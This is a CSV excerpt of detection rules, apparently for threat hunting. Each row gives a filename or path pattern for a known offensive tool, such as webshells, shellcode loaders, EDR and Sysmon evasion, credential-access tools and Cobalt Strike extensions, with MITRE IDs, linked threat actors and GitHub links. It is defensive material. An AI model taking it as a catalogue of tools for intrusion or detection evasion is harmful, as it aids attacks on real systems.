"*/Shells/shell.jsp*",".{0,1000}\/Shells\/shell\.jsp.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11212"
"*/Shells/shell.php*",".{0,1000}\/Shells\/shell\.php.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11213"
"*/Shells/shell.py*",".{0,1000}\/Shells\/shell\.py.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11214"
"*/Shells/shell.sh*",".{0,1000}\/Shells\/shell\.sh.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11215"
"*/Shells/tomcat.war*",".{0,1000}\/Shells\/tomcat\.war.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11216"
"*/Shells/wordpress.zip*",".{0,1000}\/Shells\/wordpress\.zip.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","11217"
"*/ShellServe.git*",".{0,1000}\/ShellServe\.git.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","N/A","6","1","N/A","N/A","N/A","N/A","11218"
"*/shellshock.py*",".{0,1000}\/shellshock\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11219"
"*/shellsilo.git*",".{0,1000}\/shellsilo\.git.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","11220"
"*/shellsilo.py*",".{0,1000}\/shellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","11221"
"*/ShellSync.git*",".{0,1000}\/ShellSync\.git.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","11222"
"*/ShellSync-main.zip*",".{0,1000}\/ShellSync\-main\.zip.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","11223"
"*/sherlocksecurity/*",".{0,1000}\/sherlocksecurity\/.{0,1000}","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11224"
"*/Shhhavoc.py*",".{0,1000}\/Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","11225"
"*/Shhhloader.git*",".{0,1000}\/Shhhloader\.git.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","11226"
"*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11227"
"*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11228"
"*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11229"
"*/Shhmon/*",".{0,1000}\/Shhmon\/.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","11230"
"*/ShimDB.git*",".{0,1000}\/ShimDB\.git.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","11231"
"*/ShimInjector.exe*",".{0,1000}\/ShimInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","11232"
"*/ShimMe.git*",".{0,1000}\/ShimMe\.git.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","11233"
"*/ShimsInstaller.*",".{0,1000}\/ShimsInstaller\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11234"
"*/ShInject.exe*",".{0,1000}\/ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","11235"
"*/shocknawe/*",".{0,1000}\/shocknawe\/.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","11236"
"*/shodan-api.nse*",".{0,1000}\/shodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11237"
"*/Shoggoth.exe*",".{0,1000}\/Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","11238"
"*/Shoggoth.git*",".{0,1000}\/Shoggoth\.git.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","11239"
"*/shspawnas/*",".{0,1000}\/shspawnas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","11240"
"*/Shu1337.php*",".{0,1000}\/Shu1337\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11241"
"*/ShuckNT.git*",".{0,1000}\/ShuckNT\.git.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","11242"
"*/Shwmae.exe*",".{0,1000}\/Shwmae\.exe.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11243"
"*/Shwmae.git*",".{0,1000}\/Shwmae\.git.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11244"
"*/shwmae/keys*",".{0,1000}\/shwmae\/keys.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","1","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","11245"
"*/si1ent-le/CVE-2022-0847*",".{0,1000}\/si1ent\-le\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z","11246"
"*/SigFlip.*",".{0,1000}\/SigFlip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11247"
"*/sigflip.x64.*",".{0,1000}\/sigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11248"
"*/sigflip.x86.*",".{0,1000}\/sigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11249"
"*/SigFlip/*",".{0,1000}\/SigFlip\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11250"
"*/SigLoader.go*",".{0,1000}\/SigLoader\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11251"
"*/SigLoader/*",".{0,1000}\/SigLoader\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","11252"
